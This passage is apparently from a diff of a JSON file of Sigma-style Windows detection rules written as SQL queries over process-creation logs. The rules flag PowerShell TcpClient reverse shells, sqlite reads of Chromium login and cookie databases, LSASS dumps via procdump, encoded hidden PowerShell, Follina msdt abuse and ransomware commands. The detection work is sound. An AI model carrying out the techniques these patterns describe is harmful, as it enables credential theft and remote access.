ESCAPE '\\' AND NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_certutil_download_direct_ip.yml" + "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" }, { - "title": "Potential CVE-2022-26809 Exploitation Attempt", - "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", - "status": "experimental", - "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", - "author": "Florian Roth (Nextron Systems)", + "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", + "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "status": "test", + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "author": "John Lambert (rule)", "tags": [ - "attack.initial_access", - "attack.t1190", "attack.execution", - "attack.t1569.002" + "attack.t1059.001" ], "falsepositives": [ - "Unknown", - "Some cases in which the service spawned a werfault.exe process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" + "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" }, { - "title": "SQLite Chromium Profile Data DB Access", - "id": "24c77512-782b-448a-8950-eddb0785fc71", + "title": "Potential Arbitrary Command Execution Using Msdt.EXE", + "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", - "author": "TropChaud", + "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.t1555.003", - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" - }, - { - "title": "Potential Powershell ReverseShell Connection", - "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", - "status": "stable", - "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell.", - "author": "FPT.EagleEye, wagga", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Administrative might use this function to check network connectivity" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% System.Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetBytes%' ESCAPE '\\' AND CommandLine LIKE '%.Write%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" + "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" }, { - "title": "Shell32 DLL Execution in Suspicious Directory", - "id": "32b96012-7892-429e-b26c-ac2bf46066ff", - "status": "experimental", - "description": "Detects shell32.dll executing a DLL in a suspicious directory", - "author": "Christian Burkard (Nextron Systems)", + "title": "Ping Hex IP", + "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "status": "test", + "description": "Detects a ping command that uses a hex encoded IP address", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.011" + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" - }, - { - "title": "Suspicious Hacktool Execution - Imphash", - "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", - "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Legitimate use of one of these tools" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" + "filename": "proc_creation_win_ping_hex_ip.yml" }, { - "title": "Potential Snatch Ransomware Activity", - "id": "5325945e-f1f0-406e-97b8-65104d393fff", - "status": "stable", - "description": "Detects specific process characteristics of Snatch ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "title": "MMC Spawning Windows Shell", + "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "status": "test", + "description": "Detects a Windows command line executable started from MMC", + "author": "Karneades, Swisscom CSIRT", "tags": [ - "attack.execution", - "attack.t1204" - ], - "falsepositives": [ - "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + "attack.lateral_movement", + "attack.t1021.003" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_snatch_ransomware.yml" + "filename": "proc_creation_win_mmc_susp_child_process.yml" }, { "title": "UAC Bypass via Event Viewer", @@ -14147,9757 +13759,9596 @@ "filename": "proc_creation_win_uac_bypass_eventvwr.yml" }, { - "title": "Suspicious Add User to Remote Desktop Users Group", - "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", - "status": "experimental", - "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "title": "Potential LSASS Process Dump Via Procdump", + "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "status": "stable", + "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1133", - "attack.t1136.001", - "attack.t1021.001" + "attack.defense_evasion", + "attack.t1036", + "attack.credential_access", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Administrative activity" + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" + "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" }, { - "title": "Service Registry Key Deleted Via Reg.EXE", - "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", + "title": "HackTool - TruffleSnout Execution", + "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ 